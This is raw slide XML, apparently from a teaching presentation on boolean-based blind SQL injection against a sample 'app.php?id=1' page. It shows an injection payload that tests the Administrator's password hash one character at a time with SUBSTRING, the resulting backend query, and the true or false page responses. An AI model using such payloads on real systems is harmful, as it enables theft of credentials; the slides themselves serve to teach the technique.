                <a:spcPts val="95"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4713605" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Nothing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>returned </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Returned</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>False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50" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Payload:</a:t>
            </a:r>
            <a:endParaRPr sz="2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52814" y="6796358"/>
            <a:ext cx="762000" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="125650"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="62824"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62824"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="62824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699046" y="125640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761851" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="0" y="62814"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="125640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="62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574494" y="6756517"/>
            <a:ext cx="444500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45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>‘s’ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>character </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hashed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr sz="1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9639" y="7965830"/>
            <a:ext cx="16366490" cy="7105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7305" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="477520" marR="471805">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="909319" algn="l"/>
                <a:tab pos="1197610" algn="l"/>
                <a:tab pos="4509135" algn="l"/>
                <a:tab pos="5085080" algn="l"/>
                <a:tab pos="7677150" algn="l"/>
                <a:tab pos="8973820" algn="l"/>
                <a:tab pos="9693910" algn="l"/>
                <a:tab pos="10557510" algn="l"/>
                <a:tab pos="11421745" algn="l"/>
                <a:tab pos="12717780" algn="l"/>
                <a:tab pos="13006069" algn="l"/>
                <a:tab pos="15598775" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.random.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="560">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>app.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SUBSTRING((SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'Administrator'),</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1,  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1)	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="490">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'e'</a:t>
            </a:r>
            <a:endParaRPr sz="2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7889" y="8881271"/>
            <a:ext cx="2372360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50" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Backend</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query:</a:t>
            </a:r>
            <a:endParaRPr sz="2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9639" y="9559258"/>
            <a:ext cx="16366490" cy="7105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7305" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120" marR="2080260">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1459865" algn="l"/>
                <a:tab pos="2324100" algn="l"/>
                <a:tab pos="3044190" algn="l"/>
                <a:tab pos="3476625" algn="l"/>
                <a:tab pos="3908425" algn="l"/>
                <a:tab pos="4196715" algn="l"/>
                <a:tab pos="5060315" algn="l"/>
                <a:tab pos="5492750" algn="l"/>
                <a:tab pos="5924550" algn="l"/>
                <a:tab pos="6500495" algn="l"/>
                <a:tab pos="9093200" algn="l"/>
                <a:tab pos="10389235" algn="l"/>
                <a:tab pos="11109325" algn="l"/>
                <a:tab pos="11973560" algn="l"/>
                <a:tab pos="12837795" algn="l"/>
                <a:tab pos="14133830" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="495">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SUBSTRING((SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-380">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-395">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'Administrator'),	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1,	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1)	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="490">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'e'</a:t>
            </a:r>
            <a:endParaRPr sz="20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31272" y="10587752"/>
            <a:ext cx="762000" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="125650"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699027" y="125649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761851" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="0" y="62824"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="125649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="62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25723" y="10623093"/>
            <a:ext cx="762000" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="125650"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699018" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699020" y="125649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761840" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="0" y="62824"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="125649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="62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634553" y="10645698"/>
            <a:ext cx="762000" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573375" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="573375" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573375" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="762000" h="188595">
                <a:moveTo>
                  <a:pt x="699025" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="604787" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604787" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761851" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="699025" y="62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267685" y="10566244"/>
            <a:ext cx="124142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75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Returned</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:endParaRPr sz="1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9770" y="10531062"/>
            <a:ext cx="1131697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18045" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Title </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1 is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-330">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1650" spc="-80">
